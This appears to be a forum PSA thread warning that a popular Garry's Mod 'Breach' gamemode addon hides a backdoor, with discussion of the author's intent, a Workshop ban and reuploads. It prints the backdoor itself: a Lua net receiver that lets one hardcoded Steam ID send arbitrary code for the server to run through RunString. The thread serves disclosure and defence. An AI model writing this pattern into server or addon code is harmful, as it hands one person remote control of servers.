[PSA] Backdoor in 30k sub addon (Breach)

There is backdoor in breach gamemode, and there’s like servers with lots of players running it so making PSA THREAD:



net.Receive( "SendHelp", function( len, ply )
	if ply:SteamID64() == "76561198156389563" then
		local tbl = net.ReadTable()
		local str = ""
		for k,v in pairs(tbl) do
			str = str .. v
		end
		//print(str)
		RunString( str, "BREACHHELP", false )
	end
end)


While there is a “Legit reason” Like “Helping people”, The whole gamemode is filled with shit code (Like this net receiver itself), so I doubt its for anything but malicious purpose.

Credit to glua.team for finding backdoor xD

I sent a PM to Robotboy about it

I would add him asking him to remove it before taking down the addon since so many people use it – it could have been out of the best, but uninformed intentions.

Someone that’s nice enough to help individual servers wouldn’t have gone through the thought process of making something that malicious in the first place imo. “To help people” seems like an excuse that someone would say only if they got caught.

If it was truely for “helping people”, a convar that’s disabled by default would look a lot better than just having a way to run code without anyone’s consent.

Update: The addon has been banned the workshop by robotboy
Reason: “Malicious code - backdoor - allows certain user to run any code on server” (Used Gmosh GUI to see ban reason)

It is back, it has been republished. I dunno if there is a backdoor inside of it tho.

I know the guy who made this from helping him with lua half a year ago, he’s still relatively new to making Garry’s Mod content, I dont think it was intended for malicious purposes. When I asked him he said the reupload had that code removed but I haven’t looked through it.

Reuploads with the exploit:

http://steamcommunity.com/sharedfiles/filedetails/?id=861956752
http://steamcommunity.com/sharedfiles/filedetails/?id=859852850

:goodjob:

why do people put tons of work into something just to ruin it with backdoors?

Shitty morals. Some think they have the right to some power over servers to fight bad admins or some terrible hero bullshit.

Isn’t that the reason behind serverwatch?

COUGH Hoffa. COUGH

Afto is actually a good example. He thinks he’s the victim of some persecution.

So is the reupload clean?

@FPtje is there a week we can go by without him or Hoffa being mentioned, lol

Is it possible for someone to explain how it works? I have a rough understanding of it, but I wish to know exactly.

The client with Steam64ID 76561198156389563 can send a net message to the server running the code he wants by writing a table of strings.

I wasn’t aware of any unspoken rule to have at least a week between mentions of them.

Atleast IT wasn’t a sold product that’s all I can say.

Addons should have a permission list, like the app-stores.
"This addon require _G(global access), RunString and user permissions.